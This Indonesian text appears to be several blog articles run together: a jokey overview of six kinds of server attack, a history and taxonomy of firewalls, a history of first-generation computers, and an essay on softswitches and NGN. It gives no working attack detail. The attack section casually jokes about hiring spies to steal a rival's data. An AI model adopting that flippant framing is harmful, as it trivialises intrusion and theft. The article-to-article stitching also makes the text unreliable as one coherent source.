Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap
server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6
kelas, yaitu:
Intrusion
---------
Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat
menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted
dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk
menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam
skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).
Hacking is an Art!? =)
Denial of Services (DoS)
------------------------
Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran
request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)
misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting
request pada server secara serentak asimetris dan simultan sehingga buffer server akan
kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?
(servicenya mati masak dibilang server? hehehe....)
Joyrider
--------
Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa
belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat
(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).
Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe
menyebabkan kerusakan atau kehilangan data.
Vandal
------
Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)
Scorekeeper
-----------
Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya
berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan
kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).
Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.
Spy
---
Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin
target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang
kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya!? Mau
coba Pak? =)
Dewasa ini, minat dan pemahaman terhadap sistem keamanan jaringan (network security) semakin meningkat seiring dengan tingginya kebutuhan untuk itu. Hal ini, tidak diragukan lagi, terjadi akibat meluasnya penggunaan internet dan banyaknya perusahaan yang telah mengimplementasikan teknologi informasi berbasis jaringan pada bisnis mereka. Internet firewall, dengan segala kelebihan maupun kekurangannya, adalah salah satu mekanisme pengamanan yang paling banyak dipakai saat ini. Dalam artikel ini, kita akan mempelajari secara sepintas tentang apa itu internet firewall, sejarahnya, serta melihat bagaimana ia digunakan pada saat ini maupun di masa mendatang.
Istilah “firewall” sendiri sebenarnya juga dikenal dalam disiplin lain, dan dalam kenyataannya, istilah ini tidak hanya bersangkutan dengan terminologi jaringan. Kita juga menggunakan firewall, misalnya untuk memisahkan garasi dari rumah, atau memisahkan satu apartemen dengan apartemen lainnya. Dalam hal ini, firewall adalah penahan (barrier) terhadap api yang dimaksudkan untuk memperlambat penyebaran api seandainya terjadi kebakaran sebelum petugas pemadam kebakaran datang untuk memadamkan api. Contoh lain dari firewall juga bisa ditemui pada kendaran bermotor, dimana firewall memisahkan antara ruang penumpang dan kompartemen mesin.
Dalam terminologi internet, istilah “firewall” didefinisikan sebagai sebuah titik diantara dua/lebih jaringan dimana semua lalu lintas (trafik) harus melaluinya (chooke point); trafik dapat dikendalikan oleh dan diautentifikasi melalui sautu perangkat, dan seluruh trafik selalu dalam kondisi tercatat (logged). Dengan kata lain, “firewall adalah penghalang (barrier) antara ‘kita’ dan ‘mereka’ dengan nilai yang diatur (arbitrary) pada ‘mereka’” (Chesswick, W & Bellovin, S., 1994).
Network firewall yang pertama muncul pada akhir era 1980-an, berupa perangkat router yang dipakai untuk memisahkan suatu network menjadi jaringan lokal (LAN) yang lebih kecil. Dalam kondisi ini, penggunaan firewall hanya dimaksudkan untuk mengurangi masalah peluberan (spill over) data dari LAN ke seluruh jaringan. Hal ini mencegah masalah-masalah semacam error pada manajemen jaringan, atau aplikasi yang terlalu banyak menggunakan sumber daya meluber ke seluruh jaringan. Firewall untuk keperluan sekuriti (security firewall) pertama kali digunakan pada awal dekade 1990-an, berupa router IP dengan aturan filter tertentu. Aturan sekuriti saat itu berupa sesuatu seperti: ijinkan setiap orang “di sini” untuk mengakses “ke luar sana”, juga cegahlah setiap orang (atau apa saja yang tidak disukai) “di luar sana” untuk masuk “ke sini”. Firewall semacam ini cukup efektif, tetapi memiliki kemampuan yang terbatas. Seringkali sangat sulit untuk menggunakan aturan filter secara benar. Sebagai contoh, dalam beberapa kasus terjadi kesulitan dalam mengenali seluruh bagian dari suatu aplikasi yang dikenakan restriksi. Dalam kasus lainnya, aturan filter harus dirubah apabila ada perubahan “di luar sana”.
Firewall generasi selanjutnya lebih fleksibel, yaitu berupa sebuah firewall yang dibangun pada apa yang disebut “bastion hosts”. Firewall komersial yang pertama dari tipe ini, yang menggunakan filter dan gateway aplikasi (proxies), kemungkinan adalah produk dari Digital Equipment Corp. (DEC) yang dibangun berdasarkan firewall korporat DEC. Brian Reid dan tim engineering di laboratorium sistem jaringan DEC di Pallo Alto adalah pencipta firewall DEC. Firewall komersial pertama dikonfigurasi untuk, dan dikirimkan kepada pelanggan pertamanya, sebuah perusahaan kimia besar yang berbasis di pantai timur AS pada 13 Juni 1991. Dalam beberapa bulan kemudian, Marcus Ranum dari Digital Corp. menciptakan security proxies dan menulis ulang sebagian besar kode program firewall. Produk firewall tersebut kemudian diproduksi massal dengan nama dagang DEC SEAL (singkatan dari Security External Access Link). DEC SEAL tersusun atas sebuah sistem eksternal yang disebut gatekeeper sebagai satu-satunya sistem yang dapat berhubungan dengan internet, sebuah filtering gateway yang disebut gate, dan sebuah mailhub internal
Dalam rentang waktu yang sama, Chesswick dan Bellovin di Bell labs bereksperimen dengan firewall yang berbasis sirkuit relay. Sebagai hasilnya, Raptor Eagle muncul sekitar 6 bulan setelah DEC SEAL diluncurkan, diikuti kemudian oleh produk ANS InterLock.
Pada 1 Oktober 1993, Trusted Information System (TIS) Firewall Toolkit (FWTK) diluncurkan dalam bentuk kode sumber (source code) ke komunitas internet. Ini menyediakan basis dari produk firewall komersial dari TIS yang kemudian dinamai Gauntlet. Dalam fase ini, FWTK masih digunakan untuk keperluan eksperimen, dan untuk kalangan industri dan pemerintahan sebagai basis dari sekuriti jaringan internet mereka. Pada 1994, Check Point menyusul dengan produknya, Firewall-1 yang memperkenalkan kemudahan penggunaan (user friendliness) di dunia sekuriti internet. Generasi firewall sebelum Firewall-1 memerlukan editing file berformat ASCII dengan ASCII editor. Check Point memperkenalkan ikon, warna, kendali mouse, konfigurasi berbasis X-11, dan antarmuka manajemen (management interface) sehingga sangat memudahkan proses instalasi dan administrasi firewall.
Kebutuhan firewall generasi awal lebih mudah untuk didukung karena dibatasi oleh layanan internet yang tersedia pada masa itu. Tipikal organisasi atau bisnis yang terkoneksi ke internet saat itu hanya memerlukan akses yang secure ke remote terminal access (Telnet), file transfer (FTP), electronic mail (SMTP), dan Usenet (Network News Transfer Protocol, NNTP). Dewasa ini kita menambahkan daftar ini dengan akses ke web, live news broadcasts, informasi cuaca, perkembangan bursa saham, music on demand, audio dan videoconferencing, telephony, akses database, filer sharing, dan segudang layanan lainnya.
Apa saja kerapuhan (vulnerability) dari layanan-layanan baru ini? Apa resikonya? Seringkali jawabannya adalah “kita belum tahu”.
Jenis-Jenis Firewall
Ada empat jenis firewall, atau lebih tepatnya tiga jenis ditambah dengan satu tipe hybrid (campuran). Disini kita tidak akan membahas setiap jenis secara rinci karena itu membutuhkan pembahasan tersendiri yang lebih teknis dan umumnya sudah tersedia dalam dokumentasi-dokumentasi tentang firewall. Keempat jenis tersebut masing-masing adalah:
1. Packet Filtering: Firewall jenis ini memfilter paket data berdasarkan alamat dan opsi-opsi yang sudah ditentukan terhadap paket tersebut. Ia bekerja dalam level IP paket data dan membuat keputusan mengenai tindakan selanjutnya (diteruskan atau tidak diteruskan) berdasarkan kondisi dari paket tersebut. Firewall jenis ini terbagi lagi menjadi tiga subtipe:
* Static Filtering: Jenis filter yang diiplementasikan pada kebanyakan router, dimana modifikasi terhadap aturan-aturan filter harus dilakukan secara manual.
* Dynamic Filtering: Apabila proses-proses tertentu di sisi luar jaringan dapat merubah aturan filer secara dinamis berdasarkan even-even tertentu yang diobservasi oleh router (sebagai contoh, paket FTP dari sisi luar dapat diijinkan apabila seseorang dari sisi dalam me-request sesi FTP).
* Stateful Inspection: Dikembangkan berdasarkan teknologi yang sama dengan dynamic filtering dengan tambahan fungsi eksaminasi secara bertingkat berdasarkan muatan data yang terkandung dalam paket IP.
Baik dynamic maupun stateful filtering menggunakan tabel status (state table) dinamis yang akan membuat aturan-aturan filter sesuai dengan even yang tengah berlangsung.
2. Circuit Gateways: Firewall jenis ini beroperasi pada layer (lapisan) transpor pada network, dimana koneksi juga diautorisasi berdasarkan alamat. Sebagaimana halnya Packet Filtering, Circuit Gateway (biasanya) tidak dapat memonitor trafik data yang mengalir antara satu network dengan network lainnya, tetapi ia mencegah koneksi langsung antar network.
3. Application Gateways: Firewall tipe ini juga disebut sebagai firewall berbasis proxy. Ia beroperasi di level aplikasi dan dapat mempelajari informasi pada level data aplikasi (yang dimaksudkan disini adalah isi [content] dari paket data karena proxy pada dasarnya tidak beroperasi pada paket data). Filterisasi dilakukan berdasarkan data aplikasi, seperti perintah-perintah FTP atau URL yang diakses lewat HTTP. Dapat dikatakan bahwa firewall jenis ini “memecah model client-server”.
4. Hybrid Firewalls: Firewall jenis ini menggunakan elemen-elemen dari satu atau lebih tipe firewall. Hybrid firewall sebenarnya bukan sesuatu yang baru. Firewall komersial yang pertama, DEC SEAL, adalah firewall berjenis hybrid, dengan menggunakan proxy pada sebuah bastion hosts (mesin yang dilabeli sebagai “gatekeeper” pada gambar 1) dan packet filtering pada gateway (“gate”). Sistem hybrid seringkali digunakan untuk menambahkan layanan baru secara cepat pada sistem firewall yang sudah tersedia. Kita bisa saja menambahkan sebuah circuit gateway atau packet filtering pada firewall berjenis application gateway, karena untuk itu hanya diperlukan kode proxy yang baru yang ditulis untuk setiap service baru yang akan disediakan. Kita juga dapat memberikan autentifikasi pengguna yang lebih ketat pada Stateful Packet Filer dengan menambahkan proxy untuk tiap service.
Apapun basis teknologi yang digunakan, sebuah firewall pada dasarnya berlaku sebagai sebuah gateway yang terkontrol di antara dua atau lebih network dimana setiap trafik harus melewatinya. Sebuah firewall menjalankan aturan sekuriti dan meninggalkan jejak yang dapat ditelusuri.
Pemanfaatan Firewall
Sebuah firewall mencegat dan mengontrol trafik antar network dengan tingkat kepercayaan (level of trust) yang berbeda-beda. Ia adalah bagian dari pertahanan garis depan dari suatu organisasi dan harus menjalankan aturan sekuriti pada network bersangkutan. Dalam definisi Chesswick dan Bellovin, ia menyediakan sebuah jejak (trail) yang dapat ditelusuri. Firewall merupakan tempat yang cocok untuk mendukung autentifikasi pengguna yang kuat sebaik komunikasi privat antara dua firewall. Firewall juga merupakan tempat yang tepat untuk memfokuskan keputusan tentang sekuriti dan untuk menjalankan aturan sekuriti. Ia dapat mencatat aktifitas internetwork dan membatasi wilayah cakupan (exposure) dari sebuah organisasi (Chapman & Zuichi, 1995).
Wilayah cakupan yang rentan serangan disebut sebagai “zona resiko”. Apabila sebuah organisasi terkoneksi ke internet tanpa menggunakan firewall (gambar 2), maka setiap host dalam network privat dapat mengakses secara langsung setiap resource dalam internet. Dalam hal ini, setiap host di internet dapat menyerang setiap host di network privat. Mengurangi zona resiko adalah tindakan terbaik, dan sebuah firewall internetwork memungkinkan kita untuk membatasi zona resiko. Seperti yang kita lihat di gambar 3, zona resiko termasuk firewall itu sendiri, sehingga setiap host di internet dapat menyerang firewall. Dalam keadaan ini, setiap upaya serangan akan terpusat di satu titik, dan karenanya lebih mudah untuk dikontrol.
Namun demikian, bukan berarti firewall bisa sepenuhnya diandalkan dalam urusan sekuriti. Firewall tidak dapat membaca pikiran manusia atau mendeteksi paket data dengan muatan yang tidak semestinya. Firewall juga tidak dapat melindungi network dari serangan yang berasal dari dalam (insider attack), walaupun ia masih bisa mencatat aktifitas network apabila si penyerang menggunakan gateway untuk melaksanakan aksinya. Firewall juga tidak bisa melindungi koneksi yang tidak melaluinya. Dengan kata lain, apabila seseorang terkoneksi ke internet melalui modem dan saluran telepon, maka tidak ada yang bisa dilakukan oleh firewall. Firewall juga hanya menyediakan sedikit proteksi untuk jenis serangan yang sebelumnya belum dikenal, dan bahkan proteksi yang sangat buruk terhadap serangan virus komputer.
Firewall di Masa Kini
Firewall pertama yang diaplikasikan di internet berupa autetifikasi pengguna yang kuat. Apabila aturan sekuriti mengijinkan akses ke network privat dari jaringan luar, seperti internet, maka dibutuhkan satu jenis mekanisme autentifikasi pengguna. Secara sederhana, autentifikasi dapat diartikan sebagai usaha “untuk meyakinkan keabsahan sebuah identitas”. Username dan password merupakan salah satu jenis autentifikasi, tapi bukan autentifikasi yang kuat. Dalam koneksi non-privat, seperti halnya koneksi non-enkripsi yang melintasi jaringan internet, username dan password dapat dicegat untuk dibaca. Autentifikasi yang kuat menggunakan teknik kriptografi, misalnya dengan memanfaatkan sertifikasi maupun dengan menggunakan sebuah peralatan khusus semacam kalkulator (seperti KeyBCA). Mekanisme ini mencegah apa yang disebut sebagai “replay attack” - dimana, sebagai contoh, sebuah username dengan passwordnya dicegat untuk kemudian digunakan oleh yang pihak lain tidak berhak. Karena kedudukannya itu - berada di antara sisi “trust” dan “untrust” dari network - dan karena fungsinya sebagai gateway terkontrol, firewall menjadi tempat yang logis untuk menempatkan layanan semacam ini.
Firewall jenis lain yang bekerja di internet adalah enkripsi firewall-to-firewall. Sistem ini pertama kali diaplikasikan pada firewall ANS InterLock. Saat ini, koneksi semacam ini disebut sebagai Virtual Private Network (VPN). Ia adalah “privat” karena menggunakan kriptografi. Ia menjadi privat secara “virtual” karena komunikasi privat tersebut mengalir melalui jaringan publik seperti internet. Walaupun VPN telah ada pada masa dimana firewall belum dikenal, namun ia kini mulai sering dijalankan pada firewall. Dewasa ini, kebanyakan pengguna mengharapkan vendor firewall agar juga menyediakan opsi untuk VPN. Disini, firewall bertindak sebagai titik akhir (end point) untuk VPN diantara pengguna enterprise dan mobile (telekomuter) sehingga komunikasi yang konfidensial antara perangkat yang terhubung dapat terus terjaga.
Dalam beberapa tahun terakhir, firewall juga populer untuk digunakan sebagai perangkat content screening. Beberapa aplikasi firewall di lapangan ini mencakup virus scanner, URL screening, dan scanner keyword (juga dikenal di kalangan pemerintah AS sebagai “guards”). Apabila aturan sekuriti di sebuah organisasi mewajibkan screening terhadap virus komputer, adalah tindakan yang logis untuk melakukan screening terhadap lalu lintas file pada entry point yang terkontrol seperti halnya pada firewall. Faktanya, tersedia standar untuk memasang software antivirus pada aliran data (data flow) di firewall untuk mencegat dan menganalisis file data. Demikian pula halnya dengan URL screening – akses ke www yang terkontrol melalui firewall – dan content screening juga merupakan “bagian” yang cocok untuk dilimpahkan pada firewall.
Terlepas dari segala manfaatnya, masih ada juga keraguan di kalangan administrator jaringan untuk memanfaatkan firewall, khususnya menyangkut performa sistem jaringan. Ada anggapan bahwa penggunaan firewall berpotensi untuk menurunkan performa sistem secara signifikan. Sebagai solusinya, belakangan beberapa vendor router dan firewall telah mengembangkan suatu add-on firewall yang relatif baru yang disebut “flow control” untuk menghantarkan Quality of Service (QoS). QoS, sebagai contoh kasus, dapat membatasi besarnya bandwidth network yang dapat dipakai oleh seorang pengguna jaringan, atau membatasi besarnya kapasitas network yang dapat dipakai untuk layanan yang spesifik (seperti FTP atau web). Sekali lagi, karena firewall berfungsi sebagai gateway, maka ia menjadi tempat yang logis untuk menempatkan mekanisme pengaturan QoS.
Masa Depan Firewall
Di masa mendatang, firewall diprediksi akan menjadi pusat pengaturan pada network maupun internetwork. Selama ini, firewall dipandang sebagai komponen sekuriti berskala besar pertama yang pernah dikenal, produk keamanan internet pertama yang sukses secara komersial, dan piranti sekuriti yang paling banyak digunakan. Namun firewall sendiri masih belum sepenuhnya memadai untuk mengamankan sebuah jaringan. Firewall hanyalah salah satu mekanisme yang digunakan untuk itu. Firewall dituntut untuk mampu berkomunikasi dan berinteraksi dengan piranti (device) lainnya. Firewall harus dapat berhubungan dengan sistem kontrol sekuriti jaringan, melaporkan kondisi-kondisi serta even yang sedang berlangsung, dan memungkinkan sistem kontrol merekonfigurasi sensor dan respon sistem secara keseluruhan. Sebuah firewall dapat berhubungan dengan piranti deteksi penyusupan (intrusion) pada jaringan untuk mengatur tingkat sensitifitasnya, misalnya dengan mengijinkan koneksi yang ber-autentifikasi dari luar jaringan dalam kondisi tertentu. Sebuah stasiun monitoring yang terpusat dapat memantau semua proses ini, membuat beberapa perubahan, bereaksi terhadap alarm dan peringatan-peringatan lainnya, serta meyakinkan bahwa seluruh software antivirus dan piranti content-screening berfungsi secara normal.
Dewasa ini, beberapa produk telah dibuat berdasarkan teknologi tersebut. Sistem deteksi penyusupan (Intrusion Detection System, IDS) dan sistem rekonfigurasi firewall secara otomatis berdasarkan kondisi tertentu kini telah tersedia. Namun teknologi firewall sendiri terus berevolusi ke bentuk yang lebih maju. Firewall kini memainkan peranan penting dalam strategi pengamanan yang bersifat multilayer dan multilevel.
Dengan maraknya penggunaan internet dan intranet, maka penggunaan firewall pada layanan tersebut juga makin berkembang. Ia bukan lagi menjadi satu-satunya mekanisme sekuriti, melainkan akan bekerjasama dengan sistem pengamanan lainnya. Ke depan, firewall kemungkinan akan berkembang dengan memanfaatkan teknologi yang lebih maju, namun ia akan tetap menjadi bagian tak terpisahkan dalam metode dan mekanisme pengamanan jaringan.
sumber : kutipan dari http://www.dhani.singcat.com/
GENERASI PERTAMA
Dengan terjadinya Perang Dunia Kedua, negara-negara yang terlibat dalam perang tersebut berusaha mengembangkan komputer untuk mengeksploit potensi strategis yang dimiliki komputer. Hal ini meningkatkan pendanaan pengembangan komputer serta mempercepat kemajuan teknik komputer. Pada tahun 1941, Konrad Zuse, seorang insinyur Jerman membangun sebuah komputer, Z3, untuk mendesain pesawat terbang dan peluru kendali.
Pihak sekutu juga membuat kemajuan lain dalam pengembangan kekuatan komputer. Tahun 1943, pihak Inggris menyelesaikan komputer pemecah kode rahasia yang dinamakan Colossus untuk memecahkan kode-rahasia yang digunakan Jerman. Dampak pembuatan Colossus tidak terlalu mempengaruhi perkembangan industri komputer dikarenakan dua alasan. Pertama, colossus bukan merupakan komputer serbaguna (general-purpose computer), ia hanya didesain untuk memecahkan kode rahasia. Kedua, keberadaan mesin ini dijaga kerahasiaannya hingga satu dekade setelah perang berakhir.
Usaha yang dilakukan oleh pihak Amerika pada saat itu menghasilkan suatu kemajuan lain. Howard H. Aiken (1900-1973), seorang insinyur Harvard yang bekerja dengan IBM, berhasil memproduksi kalkulator elektronik untuk US Navy. Kalkulator tersebut berukuran panjang setengah lapangan bola kaki dan memiliki rentang kabel sepanjang 500 mil.
The Harvd-IBM Automatic Sequence Controlled Calculator, atau Mark I, merupakan komputer relai elektronik. Ia menggunakan sinyal elektromagnetik untuk menggerakkan komponen mekanik. Mesin tersebut beropreasi dengan lambat (ia membutuhkan 3-5 detik untuk setiap perhitungan) dan tidak fleksibel (urutan kalkulasi tidak dapat diubah). Kalkulator tersebut dapat melakukan perhitungan aritmatik dasar dan persamaan yang lebih kompleks.
Perkembangan komputer lain pada masa kini adalah Electronic Numerical Integrator and Computer (ENIAC), yang dibuat oleh kerjasama antara pemerintah Amerika Serikat dan University of Pennsylvania . Terdiri dari 18.000 tabung vakum, 70.000 resistor, dan 5 juta titik solder, komputer tersebut merupakan mesin yang sangat besar yang mengkonsumsi daya sebesar 160kW.
Komputer ini dirancang oleh John Presper Eckert (1919-1995) dn John W. Mauchly (1907-1980), ENIAC merupakan komputer serbaguna (general purpose computer) yang bekerja 1000 kali lebih cepat dibandingkan Mark I.
Pada pertengahan 1940-an, John von Neumann (1903-1957) bergabung dengan tim University of Pennsylvania dalam usha membangun konsep desin komputer yang hingga 40 tahun mendatang masih dipakai dalam teknik komputer. Von Neumann mendesain Electronic Discrete Variable Automatic Computer(EDVAC) pada tahun 1945 dengan sebuh memori untuk menampung baik program ataupun data. Teknik ini memungkinkan komputer untuk berhenti pada suatu saat dan kemudian melanjutkan pekerjaannya kembali. Kunci utama arsitektur von Neumann adalah unit pemrosesan sentral (CPU), yang memungkinkan seluruh fungsi komputer untuk dikoordinasikan melalui satu sumber tunggal. Tahun 1951, UNIVAC I (Universal Automatic Computer I) yang dibuat oleh Remington Rand, menjadi komputer komersial pertama yang memanfaatkan model arsitektur von Neumann tersebut.
Baik Badan Sensus Amerika Serikat dan General Electric memiliki UNIVAC. Salah satu hasil mengesankan yang dicapai oleh UNIVAC dalah keberhasilannya dalam memprediksi kemenangan Dwilight D. Eisenhower dalam pemilihan presiden tahun 1952.
Komputer Generasi pertama dikarakteristik dengan fakta bahwa instruksi operasi dibuat secara spesifik untuk suatu tugas tertentu. Setiap komputer memiliki program kode-biner yang berbeda yang disebut “bahasa mesin” (machine language). Hal ini menyebabkan komputer sulit untuk diprogram dan membatasi kecepatannya. Ciri lain komputer generasi pertama adalah penggunaan tube vakum (yang membuat komputer pada masa tersebut berukuran sangat besar) dn silinder magnetik untuk penyimpanan data.
Konvergensi antara jaringan sirkit (circuit networks) dengan jaringan paket (packet network)—termasuk di dalamnya jaringan seluler—akan menjadi sebuah kebutuhan di masa yang akan datang. Ini karena di masa datang komunikasi bukan hanya melibatkan suara, namun sudah data, image dan bahkan video.
Kapan terjadinya dan apakah jaringan sirkit—kita kenal dengan layanan telpon tetap (PSTN)—akan dihapuskan untuk kemudian diganti dengan infrastruktur jaringan paket, itu masih menjadi tanda tanya. Akan tetapi, kalaupun hal itu terjadi, akan memakan waktu lama sampai seluruh jaringan tadi diganti dan menuju jaringan generasi masa depan (NGN-Next Generation Network).
Layanan komunikasi suara selama ini masih berbasis pada circuit-swithed. Pada jaringan ini, setiap call (panggilan) akan diberikan sebuah kanal tersendiri (dedicated), dan tidak ada pengguna lain yang dapat menggunakan kanal tersebut selama call yang tadi masih berlangsung. Kelebihannya, layanan ini mendukung real time-service. Namun, kelemahannya juga banyak. Kanal yang idle (tida aktif) karena tidak ada yang menggunakan juga harus tetap ‘bekerja’. Belum lagi biaya pembangunan dan pengembangan jaringan-infrastrukutur yang relatif mahal. Jumlah aplikasi layanan ini juga terbatas.
Sementara itu, jaringan paket digunakan untuk komunikasi data. Dalam jaringan ini, informasi dipecah menjadi beberapa bagian (disebut paket, frame atau pun sel), diberi header—berisi informasi pengirim, penerima dan urutan paket dari informasi —baru setelah itu dikirim. Pada pengiriman, semua kanal bisa digunakan,—tidak seperti pada circuit-switch—dengan memih kanal yang kosong dan paling cepat sampai ke tujuan/penerima. Kelebihan jaringan ini tentu saja dari efisiensi pemakaian kanal, karena setiap pengguna jaringan bisa menggunakan semua kanal yang tersedia untuk mengirim informasi ke pengguna yang lain.
Sejak berkembangnya telepon internet (VoIP) maka layanan komunikasi suara bukan hanya bisa dilewatkan oleh jaringan sirkit namun juga oleh jaringan paket yang berbasis IP (Internet Protokol). Dan lagi dengan teknik packet voice, dimana suara akan dikonversi menjadi bentuk digital, kemudian dimampatkan (compress) dan akhirnya dibagi manjadi beberapa paket suara untuk kemudian dikirim ke penerima via jaringan paket, ternyata memberikan kualitas bagus. Ini membuka peluang untuk mengirimkan informasi suara lewat jaringan paket, dalam bentuk packet voice.
Dengan melihat fakta dan aspek teknis di atas, tampaknya jaringan masa depan—Next Generation Network—memang akan berbasis paket. Namun dengan mempertimbangkan aspek bisnis, dalam hal ini biaya investasi yang harus ditanamkan, mengganti seluruh jaringan sirkit dengan jaringan paket akan membutuhkan biaya yang sangat besar. Oleh karena itu muncul solusi dengan melakukan migrasi antar jaringan secara bertahap. Dalam proses ini, jaringan sirkit tetap akan bisa berfungsi dan bahkan berhubungan dengan jaringan paket secara simultan. Dengan begitu, perusahaan penyedia layanan telekomunikasi tetap dapat mengambil untung dari layanan selama ini dan secara bertahap melakukan up-grade menuju jaringan berbasis paket.
Untuk mendukung solusi itu, telah muncul satu alat yang bernama softswitch. Alat ini mampu menghubungkan antara jaringan sirkit dengan jaringan paket, termasuk di dalamnya adalah jaringan telpon tetap (PSTN), internet yang berbasis IP, kabel TV dan juga jaringan seluler yang telah ada selama ini.
Sebuah forum bernama ISC (International Softswitch Consortium)—beranggotakan Siemens, NTT, Alcatel, Cisco, HSS, Sonus, Telcordia, dll—yang membahas tentang softswitch, Next Generation Network dan juga melakukan uji standar terhadap beberapa produk softswitch memberikan definisi tentang softswitch sebagai berikut: segala hal yang berhubungan dengan sistem komunikasi generasi masa depan (next generation communication) yang berbasis open-standard, mengintegrasikan layanan voice, data dan video dan menggelar layanan value-added yang lebih menjanjikan dibandingkan layanan PSTN sekarang.
Softwitch dikembangkan secara terpisah, perangkat keras (hardware), disebut Media Gateway (MG) dan perangkat lunaknya (software), disebut Media Gateway Controller (MGC) yang fokus pada software call-processing. Alasan terbesar mengapa pengembangannya dipisah adalah pada etika open-standard tadi, dimana monopoli baik sisi hardware maupun software menjadi hilang, dengan begitu para pemain akan bersaing secara adil dan masing-masing akan menawarkan produk terbaiknya ke pasar. Selain itu, juga membuka peluang bagi perusahaan lain, terutama di bagian software call prosessing untuk ikut bermain. Dan yang pasti hal ini juga akan ‘memanjakan’ para penyedia layanan telekomunikasi dalam memilih produk yang paling kompetitif dan sesuai dengan kebutuhan. Penyedia layanan juga bisa melakukan setting jaringan, membuat konfigurasi dan pengembangan sesuai dengan kebutuhanya tanpa harus terpaku pada satu vendor. Hal ini bertolak belakang dengan pengembangan teknologi jaringan sirkit yang sangat vendor-driven, yaitu ketergantngan operator penyedia layanan dengan pihak suplier sangat tinggi, termasuk biaya penambahan dan testing feature baru yang mahal, sehingga layanan yang diberikan masih bertumpu pada transfer suara saja.
MGC akan bekerja di tataran pengaturan panggilannya (call control) serta call processing. MGC akan mengontrol panggilan yang masuk untuk mengetahui jenis media penggilan dan tujuannya. Dari situ, MGC akan mengirikan sinyal ke MG untuk melakukan koneksi, baik intrakoneksi jaringan—sirkit ke sirkit atau paket ke paket; maupun interkoneksi jaringan—sirkit ke paket dan sebaliknya.Jika diperlukan, MGC akan meminta MG melakukan konversi media yang sesuai dengan permintaan, atau langsung meneruskan panggilan jika tidak diperlukan konversi.
MGC menganggap MG sebagai kumpulan terminasi. Dalam fungsi itu, maka MGC dapat meminta MG melakukan konversi, koneksi dan pengiriman ring-tone (dering suara telpon) ke tujuan. Antara MGC dan MG sendiri akan saling berhubungan dengan protokol Megaco atau MGCP (Media Gateway Control Protocol).
Sementara itu, satu MGC akan berhubungan dengan MGC yang lain, baik itu yang berada di jaringan yang sama maupun berbeda, dengan mengirimkan protokol sinyal tertentu. Untuk jaringan sirkit, MGC akan mengirimkan SS7 (Signalling System 7), sementara jika berhubungan dengan jaringan paket, maka MGC akan menggunakan H.323 atau SIP (Season Initiation Protocol).
MG sendiri ‘hanya’ akan bekerja sebagai converter antara jaringan sirkit dengan jaringan paket. Di sini fungsi softswitch menjadi hanya setara dengan ‘switch analog’ dan tidak memberikan layanan yang lain. MG juga bisa bekerja di sisi pelanggan maupun penyedia layanan, dimana softwitch bukan hanya berfungsi sebagai converter, namun juga memberikan feature lebih, termasuk dial-tone tentunya. Pada posisi ini, maka softswitch akan bekerja lebih kompleks.
MG juga akan mengirimkan bermacam sinyal, tergantung jenis media yang digunakan. Sinyal itu dikirm atas permintaan MGC, sehingga dapat dideteksi oleh terminal atau oleh MGC selanjutnya.
Softswitch akan memegang peranan penting di masa transisi dimana di satu sisi jaringan sirkit masih eksis sementara di sisi lain kebutuhan akan jaringan paket makin besar, terutama diasari alasan bahwa jaringan paket lebih ‘hemat’, dan lebih handal dalam pengiriman informasi terutama yang dalam format data, juga munculnya teknik paket suara (packet voice) yang membuat suara yang dikirim mampu dikonversi menjadi bentuk paket digital untuk kemudian dikirim via jaringan paket, ditambah fakta bahwa dengan perubahan dari sirkit ke paket akan banyak biaya yang bisa ditekan, terutama biaya opersional. Hal-hal seperti itulah yang semakin memacu terwujudnya jaringan paket terintegrasi dengan nama Next Generation Networks (NGN).
Bagaimana dengan kita?...Pintu sebenarnya terbuka lebar bagi masuknya pemain baru di masa transisi sampai era NGN nanti. Baik untuk operator baru, bisnis content-service provider, dan tentu saja bisnis 3rd party yang menyediakan jasa outsourcing jaringan terintegrasi lewat softswitch.
Patut ditunggu gebrakan pemerintah dalam membuat regulasi di bidang ini. Akan lebih bijak jika pemilihan teknologi telekomunikasi yang akan diterapkan di negara ini, bukan hanya berdasar aspek bisnis, kemungkinan masuknya investor baru, atau bahkan gengsi kepada negara lain—yang ini sangat tidak berdasar. Namun patut juga dipertimbangkan aspek teknis, kompatibilitas dan konvergensi dengan infrastrukutur yang eksis, dan tentu saja, portofolio masa depan dunia telekomunikasi Indonesia. Semoga kita belajar dari kesalahan kita.